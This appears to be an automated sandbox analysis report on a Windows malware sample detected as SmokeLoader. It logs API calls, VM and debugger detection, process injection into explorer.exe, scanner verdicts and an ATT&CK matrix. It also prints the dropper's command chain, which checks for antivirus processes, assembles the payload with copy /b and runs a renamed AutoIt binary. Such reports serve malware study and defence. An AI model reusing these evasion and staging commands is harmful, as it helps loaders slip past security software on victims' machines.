Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1			Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 451	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 377	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 382	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	API coverage: 5.2 %
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	API coverage: 0.3 %

Source: C:\Windows\explorer.exe TID: 6856

Thread sleep count: 451 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Code function: 0_2_0040687E FindFirstFileW,FindClose,	0_2_0040687E
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Code function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C2D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_007D4005
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007D494A GetFileAttributesW,FindFirstFileW,FindClose,	19_2_007D494A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_007DC2FF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007DCD14 FindFirstFileW,FindClose,	19_2_007DCD14
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	19_2_007DCD9F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_007DF5D8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_007DF735
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_007DFA36
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_007D3CE2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	27_2_007D4005
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	27_2_007DC2FF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007D494A GetFileAttributesW,FindFirstFileW,FindClose,	27_2_007D494A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007DCD14 FindFirstFileW,FindClose,	27_2_007DCD14
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	27_2_007DCD9F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	27_2_007DF5D8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	27_2_007DF735
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	27_2_007DFA36
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	27_2_007D3CE2

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_00785D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

19_2_00785D13

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior

Source: explorer.exe, 0000001C.00000000.2297108695.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 0000001C.00000002.2484651579.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Labs.pif, 00000013.00000002.2258368297.0000000005070000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307149631.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 0000001C.00000000.2307149631.0000000009013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000001C.00000000.2299433125.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_xU1
Source: Labs.pif, 00000013.00000002.2257650033.00000000015B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX>
Source: explorer.exe, 0000001C.00000002.2484651579.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000001C.00000002.2484651579.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 0000001C.00000002.2484651579.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000001C.00000000.2307149631.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 0000001C.00000002.2484651579.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: explorer.exe, 0000001C.00000002.2484651579.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: explorer.exe, 0000001C.00000000.2299433125.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000001C.00000002.2484651579.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2307149631.0000000008F27000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT`
Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: Labs.pif, 00000013.00000002.2258368297.0000000005070000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWindows\System32\mswsock.dll
Source: explorer.exe, 0000001C.00000000.2297108695.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000001C.00000000.2297947837.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 0000001C.00000002.2484651579.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001C.00000000.2297108695.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe

API call chain: ExitProcess graph end node

graph_0-3810

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

System information queried: CodeIntegrityInformation

Jump to behavior

Found API chain indicative of debugger detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

graph_19-99265

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007E45D5 BlockInput,

19_2_007E45D5

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_00785240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

19_2_00785240

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007A5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

19_2_007A5CAC

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007EC6D9 LoadLibraryA,GetProcAddress,

19_2_007EC6D9

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007C88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

19_2_007C88CD

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_0079A354 SetUnhandledExceptionFilter,	19_2_0079A354
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_0079A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_0079A385
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_0079A354 SetUnhandledExceptionFilter,	27_2_0079A354
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_0079A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_0079A385

HIPS / PFW / Operating System Protection Evasion

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Thread created: C:\Windows\explorer.exe EIP: F419F8

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007C9369 LogonUserW,

19_2_007C9369

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_00785240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

19_2_00785240

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007D1AC6 SendInput,keybd_event,

19_2_007D1AC6

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007D51E2 mouse_event,

19_2_007D51E2

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Origins Origins.cmd & Origins.cmd & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 55116385	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "SlutSteLouisTranslation" Cyprus	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Breeding + Fuji + Weather 55116385\s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif 55116385\Labs.pif 55116385\s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

19_2_007C88CD

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007D4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

19_2_007D4F1C

Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000281C000.00000004.00000020.00020000.00000000.sdmp, Labs.pif, 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmp, Labs.pif, 0000001B.00000000.2191562809.0000000000826000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Labs.pif, explorer.exe, 0000001C.00000000.2299260353.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2484651579.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2297618688.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001C.00000000.2297618688.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000002.2478812587.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001C.00000000.2297618688.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000002.2478812587.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: explorer.exe, 0000001C.00000002.2475635005.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2297108695.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 0000001C.00000000.2297618688.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000002.2478812587.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_0079885B cpuid

19_2_0079885B

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007B0030 GetLocalTime,__swprintf,

19_2_007B0030

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007B0722 GetUserNameW,

19_2_007B0722

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007A416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

19_2_007A416A

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe

Code function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004034FC

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Source: Labs.pif	Binary or memory string: WIN_81
Source: Labs.pif	Binary or memory string: WIN_XP
Source: Labs.pif	Binary or memory string: WIN_XPe
Source: Labs.pif	Binary or memory string: WIN_VISTA
Source: Labs.pif	Binary or memory string: WIN_7
Source: Labs.pif	Binary or memory string: WIN_8
Source: Orders.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007E696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		19_2_007E696E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007E6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		19_2_007E6E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	117 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	312 Process Injection	11 Masquerading	LSA Secrets	541 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	22 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
lSmb6nDsrC.exe	68%	Virustotal		Browse
lSmb6nDsrC.exe	61%	ReversingLabs	Win32.Trojan.Privateloader
lSmb6nDsrC.exe	100%	Avira	TR/AD.Nekark.ccjnv
lSmb6nDsrC.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	7%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	3%	Virustotal		Browse

Unpacked PE Files

